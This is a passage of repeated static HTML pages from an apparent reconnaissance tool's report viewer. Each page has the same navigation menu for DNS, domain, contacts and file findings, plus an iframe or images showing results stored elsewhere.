74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Loadbalancing</small></h2>
80 | 			<iframe src="../data/loadbalancing.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/names.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li class="current"><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li class="current"><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 
26 | 			<li><a href="#">DNS</a>
27 | 			<ul>
28 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
29 | 			     <li><a href="../pages/config.htm">Config</a></li>
30 | 			     <li><a href="../pages/records.htm">Records</a></li>
31 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
32 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
33 | 			</ul>         
34 | 			</li>
35 | 
36 | 			<li><a href="#">Domain</a>
37 | 			<ul>
38 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
39 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
40 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
41 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
42 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
43 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
44 | 			</ul>         
45 | 			</li>
46 | 
47 | 			<li><a href="#">Files</a>
48 | 			<ul>
49 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
50 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
51 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
52 | 			     <li><a href="../pages/txt.htm">Text</a></li>
53 | 			     <li><a href="../pages/doc.htm">Word</a></li>
54 | 			</ul>         
55 | 			</li>
56 | 
57 | 			<li><a href="#">Reports</a>
58 | 			<ul>
59 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
60 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
61 | 			</ul>         
62 | 			</li>
63 | 
64 | 			<li><a href="#">Web</a>
65 | 			<ul>
66 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
67 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
68 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
69 | 			</ul>         
70 | 			</li>
71 | 		</ul>
72 | 	</div>
73 | </div>
74 | 
75 | <div class="clear"></div>
76 | 
77 | <div class="wrapper">
78 | 	<div class="container_12">
79 | 		<div class="main-content">
80 | 			<h2 class="page-header">Contacts: <small class="lg-text">Names</small></h2>
81 | 			<iframe src="../data/names.htm" width="100%"></iframe>
82 | 		</div>
83 | 	</div>
84 | </div>
85 | 
86 | </body>
87 | 
88 | </html>
89 | 
90 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/netcraft.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li class="current"><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Netcraft</small></h2>
80 | 		</div>
81 | 	</div>
82 | </div>
83 | 
84 | <center><img src="../images/netcraft.png"></center>
85 | <br>
86 | <center><img src="../images/netcraft2.png"></center>
87 | 
88 | </body>
89 | 
90 | </html>
91 | 
92 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/passive-recon.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li class="current"><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li class="current"><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Reports: <small class="lg-text">Passive Recon</small></h2>
80 | 			<iframe src="../data/passive-recon.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/pdf.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li class="current"><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">PDF</small></h2>
80 | 			<iframe src="../data/pdf.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/ppt.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li class="current"><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">PowerPoint</small></h2>
80 | 			<iframe src="../data/ppt.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/records.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li class="current"><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Records</small></h2>
80 | 			<iframe src="../data/records.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/squatting.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li class="current"><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Squatting</small></h2>
80 | 			<iframe src="../data/squatting.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/subdomains.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li class="current"><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Subdomains</small></h2>
80 | 			<iframe src="../data/subdomains.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/traceroute.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li class="current"><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
